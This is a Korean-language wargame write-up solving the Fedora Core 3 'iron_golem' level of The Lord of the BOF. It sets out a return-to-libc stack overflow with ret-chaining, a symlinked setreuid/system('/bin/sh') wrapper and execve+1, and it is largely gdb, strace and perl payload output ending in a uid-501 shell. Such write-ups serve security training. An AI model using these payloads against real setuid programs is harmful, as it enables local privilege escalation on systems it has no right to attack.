RedHat -> Fedora 로 넘어오면서 바뀌어진 환경
1.DEP 환경 : Non-Excute stack 이라고도 불리며 스택에 있는 코드는 실행 권한없음 -> 즉 스택에 쉘코드를 박고 ret주소를 가리켜 공격하는 방식은 끝남.
2.ASC Armor 기능 : Lib 주소에 맨 첫자리가 00 (NULL) 값이 됨으로써 여러번 호출이 안되고 단 한번의 라이브러리 들로만 호출이 됨.
3. Random Stack : 스택의 주소값이 실행할 때 마다 random 하게 변한다. 즉 정확한 주소를 맞출 수 없다. |
기존에 LOB RedHat 원정대의 경우는 쉘코드를 많이 활용 했었지만, 페도라원정대에서는 RTL 기법을 최대한 활용 하는 방향으로 가야 편하다.
아래는 페도라의 수문장인 iron_golem 이다.
/*
The Lord of the BOF : The Fellowship of the BOF - iron_golem - Local BOF on Fedora Core 3 - hint : fake ebp */
int main(int argc, char *argv[]) { char buffer[256];
if(argc < 2){ printf("argv error\n"); exit(0); }
strcpy(buffer, argv[1]); printf("%s\n", buffer); } |
정말 다시 돌아온 것같은 느낌의 쉬운 코드.. 간단하게 return adress 의 주소값을 바꿀 수 있는 구조이다.
[gate@Fedora_1stFloor ~]$ gdb -q iron_golem(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) disass main Dump of assembler code for function main: 0x080483d0 <main+0>: push %ebp 0x080483d1 <main+1>: mov %esp,%ebp 0x080483d3 <main+3>: sub $0x108,%esp // stack 의 메모리 할당 부분 . 0x080483d9 <main+9>: and $0xfffffff0,%esp 0x080483dc <main+12>: mov $0x0,%eax 0x080483e1 <main+17>: add $0xf,%eax 0x080483e4 <main+20>: add $0xf,%eax 0x080483e7 <main+23>: shr $0x4,%eax 0x080483ea <main+26>: shl $0x4,%eax 0x080483ed <main+29>: sub %eax,%esp 0x080483ef <main+31>: cmpl $0x1,0x8(%ebp) 0x080483f3 <main+35>: jg 0x804840f <main+63> 0x080483f5 <main+37>: sub $0xc,%esp 0x080483f8 <main+40>: push $0x8048524 0x080483fd <main+45>: call 0x80482f8 <_init+56> 0x08048402 <main+50>: add $0x10,%esp 0x08048405 <main+53>: sub $0xc,%esp 0x08048408 <main+56>: push $0x0 0x0804840a <main+58>: call 0x8048308 <_init+72> 0x0804840f <main+63>: sub $0x8,%esp 0x08048412 <main+66>: mov 0xc(%ebp),%eax 0x08048415 <main+69>: add $0x4,%eax 0x08048418 <main+72>: pushl (%eax) 0x0804841a <main+74>: lea 0xfffffef8(%ebp),%eax 0x08048420 <main+80>: push %eax 0x08048421 <main+81>: call 0x8048318 <_init+88> 0x08048426 <main+86>: add $0x10,%esp 0x08048429 <main+89>: sub $0x8,%esp 0x0804842c <main+92>: lea 0xfffffef8(%ebp),%eax 0x08048432 <main+98>: push %eax 0x08048433 <main+99>: push $0x8048530 0x08048438 <main+104>: call 0x80482f8 <_init+56> 0x0804843d <main+109>: add $0x10,%esp 0x08048440 <main+112>: leave 0x08048441 <main+113>: ret 0x08048442 <main+114>: nop 0x08048443 <main+115>: nop End of assembler dump. (gdb) (gdb) print 0x108 $1 = 264 (gdb)
|
페이로드를 그려보면 다음과 같다.
[buffer = 264 ] [sfp =4 ] [ret =4] [argc =4 ][argv =4 ]
[gate@Fedora_1stFloor ~]$ cp iron_golem iron_golen
[gate@Fedora_1stFloor ~]$ ulimit -c 10000 [gate@Fedora_1stFloor ~]$ iron_golen `perl -e 'print "a"x268,"bbbb"'` -bash: iron_golen: command not found [gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"bbbb"'` aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb Segmentation fault (core dumped) [gate@Fedora_1stFloor ~]$ gdb -c core.7 core.7049 core.7197 [gate@Fedora_1stFloor ~]$ gdb -c core.7197 GNU gdb Red Hat Linux (6.1post-1.20040607.41rh) Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu". Core was generated by `./iron_golen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'. Program terminated with signal 11, Segmentation fault. #0 0x62626262 in ?? () (gdb) |
RET 주소가 bbbb 로 싀워진것을 확인 할 수 있다.
다음은 RTL 에 쓸 system() 함수의 시작 주소값을 알아 보자.
[gate@Fedora_1stFloor ~]$ gdb iron_golen GNU gdb Red Hat Linux (6.1post-1.20040607.41rh) Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main Breakpoint 1 at 0x80483d9 (gdb) r Starting program: /home/gate/iron_golen (no debugging symbols found)...(no debugging symbols found)... Breakpoint 1, 0x080483d9 in main () (gdb) print system $1 = {<text variable, no debug info>} 0x7507c0 <system> (gdb) |
우선 기본 RTL 공격 페이로드를 봐보자
[buffer 264 ] [sfp = 4 ] [ RETURN ] [argc ] [buffer = a*264 ] [sfp = aaaa] [ &system()] [argc] [&(system 함수의 인자 값) ]
-> ln -s symbolic_link
sysbolic_link.c #include<stdio.h> int main(){ setreuid(geteuid(),geteuid());
system("/bin/sh");
return 0; }
|
그리고 system 함수를 RET에 넣고 시작하여 인자로 쓸 부분을 확인해 보자.
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu
sh: 9ÛôþFÛôþ: command not found
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu
sh: 9»öþF»öþ: command not found
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu
sh: 9kôþFkôþ: command not found
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$
무언가가 실행 된 것을 볼 수 있으나 지정된 프로그램이나 명령어가 아니므로 command not found 가 뜨고 있다.
그리고 그 값이 계속 변한다. 이유인 즉 아직 system 함수의 인자로 쓸 값이 Random 한 스택영역에 있기 때문이다.
우리는 이를 해결하기 위해서 스택 영역을 벗어나야 한다.
그 중 한 방법으로 ret 의 값으로 다시 ret 주소를 넣고, 그 ret주소에는 다시 ret 주소를 넣는 방식을 사용하여 eip를 계속 올려내는 방법이 있다.
그방법을 써서 고정된 영역으로 인자값을 옴겨 보도록 하겠다.
0x08048441 <main+113>: ret 0x08048442 <main+114>: nop 0x08048443 <main+115>: nop End of assembler dump. (gdb) |
GDB 의 disass 를 통하여 RET 의 주소값은 0x08048441 이라는 것을 알 수 있고, 이를 이용하여 위에 설명 했던 방식으로
페이로드를 짜보자.d
[buffer 264 ] [sfp = 4 ] [ RETURN ] [argc ] [buffer = a*264 ] [sfp = aaaa] [ ret = &ret ] [ ret= &ret ] [ret = & ret ] ...... [system() ] [ ] [ 인자값 ] ln - s symbolic_link
|
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAÀu
sh: ‹Uðƒì‰Á1À…Òt eô[^_]ËMè‹@·H‹Žˆ: command not found
Segmentation fault (core dumped)ÿu‹Mä‰
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAÀu
sh: ‹Uðƒì‰Á1À…Òt eô[^_]ËMè‹@·H‹Žˆ: command not found
Segmentation fault (core dumped)ÿu‹Mä‰
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`
보면 RET을 두번만 호출 하였는데도 같은 값이 출력 됨을 확인 할 수 있다.
이녀석들을 전부다 인자로 만들어줘야 하나 이는 너무 길어보이므로 3번 더 RET을 덮어 보겠다.
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu
sh: íƒ: No such file or directory
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu
sh: íƒ: No such file or directory
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu
sh: íƒ: No such file or directory
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$
훨씬 짧아 졌다. 이 값의 헥사값을 보기 위해서 2> 2번 오류로 저장해보자.
[gate@Fedora_1stFloor ~]$ xxd r1.txt 0000000: 7368 3a20 6161 6161 3a20 4e6f 2073 7563 6820 sh: ..: No such 0000010: 6669 6c65 206f 7220 6469 7265 6374 6f72 file or director 0000020: 790a
|
3a 는 : 을 의미하는 헥사 코드이다. 73 은 s 68은 h 이다 20은 공백이므로 그 사이 값인 6161 6161 이 인자값으로 들어 간 값이라는 것을 확인해 줄 수 있다.
이를 심볼릭 링크로 걸어 보겠다.
[gate@Fedora_1stFloor ~]$ ln -s symbolic_link `perl -e 'print "\x61\x61\x61\x61"'`
[gate@Fedora_1stFloor ~]$ ls (??? ??? core.7364 iron_golem.c r1.txt result1.txt result.txt aaaa sh shell symbolic_link ZY??$?? ?? ? iron_golem iron_golen result result2.txt r[gate@Fedora_1stFloor sh.c shell.c symbolic_link.c ZY??$??: [gate@Fedora_1stFloor ~]$ pwd /home/gate [gate@Fedora_1stFloor ~]$ export PATH = $PATH:/home/gate -bash: export: `=': not a valid identifier -bash: export: `/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gate/bin:/home/gate': not a valid identifier [gate@Fedora_1stFloor ~]$ export PATH=$PATH:/home/gate [gate@Fedora_1stFloor ~]$ `perl -e 'print "
\x61\x61\x61\x61"'` sh-3.00$ exit exit [gate@Fedora_1stFloor ~]$ |
공격!
[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAÀu
sh-3.00$ id
uid=500(gate) gid=500(gate) groups=500(gate) context=user_u:system_r:unconfined_t
sh-3.00$
여기까지 왔는데 UID가 상승하지 않았다.
sh-3.00$
이유인 즉슨 system() 함수는 내부 루틴중에 geteuid 를 재설정 해주는 부분이 있기 때문에 이를 유지 할 수 없다. 따라서 system 함수의 주소값 대신에 execve 주소값을 찾아 줘야 한다.
(gdb) p execve
$1 = {<text variable, no debug info>} 0x7a5490 <execve> (gdb) |
그리고 이 주소값에 프롤로그 부분을 건너 뛰기 위해서 1을 더해준다.
[gate@Fedora_1stFloor ~]$ strace ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\x91\x54\x7a\x00"'`execve("./iron_golem", ["./iron_golem", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz"], [/* 20 vars */]) = 0 uname({sys="Linux", node="Fedora_1stFloor", ...}) = 0 brk(0) = 0x9d16000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=28384, ...}) = 0 old_mmap(NULL, 28384, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf6ff9000 close(3) = 0 open("/lib/tls/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0 \17s\000"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1512400, ...}) = 0 old_mmap(0x71c000, 1207532, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x71c000 old_mmap(0x83d000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x120000) = 0x83d000 old_mmap(0x841000, 7404, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x841000 close(3) = 0 old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf6ff8000 mprotect(0x83d000, 8192, PROT_READ) = 0 mprotect(0x718000, 4096, PROT_READ) = 0 set_thread_area({entry_number:-1 -> 6, base_addr:0xf6ff8940, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 munmap(0xf6ff9000, 28384) = 0 fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 1), ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf6fff000 write(1, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 280aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz ) = 280 execve("<íƒ", [0], [/* 1 var */]) = -1 ENOENT (No such file or directory) --- SIGSEGV (Segmentation fault) @ 0 (0) --- +++ killed by SIGSEGV +++
|
이 내용을 텍스트 파일로 저장하고 헥사 값으로 열어보자.
[gate@Fedora_1stFloor ~]$ strace ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\x91\x54\x7a\x00"'` 2> res00.txt
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz
[gate@Fedora_1stFloor ~]$xxd res00.txt
execve 가 호출된 부분만을 보면 아래와 같다.
[gate@Fedora_1stFloor ~]$ xxd res00.txt | grep cve 0000000: 6578 6563 7665 2822 2e2f 6972 6f6e 5f67 execve("./iron_g 0000760: 7865 6376 6528 223c ed83 222c 205b 305d xecve("<..", [0] [gate@Fedora_1stFloor ~]$ |
0x22 가 " 를 의미하는 헥사 코드 이므로 그 사이에 있는 3c ed 83 헥사 코드가 인자 값으로 들어가 있는 부분이다.
이를 다시 심볼릭 링크걸어보고 공격해 보자.
[gate@Fedora_1stFloor ~]$ ln -s symbolic_link `perl -e 'print "\x3c\xed\x83"'`
[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\x91\x54\x7a\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz
[501]
sh-3.00$ id
uid=501(iron_golem) gid=500(gate) groups=500(gate) context=user_u:system_r:unconfined_t
sh-3.00$
sh-3.00$ my-pass
euid = 501
blood on the fedora
sh-3.00$
hdconNo5_exp.py
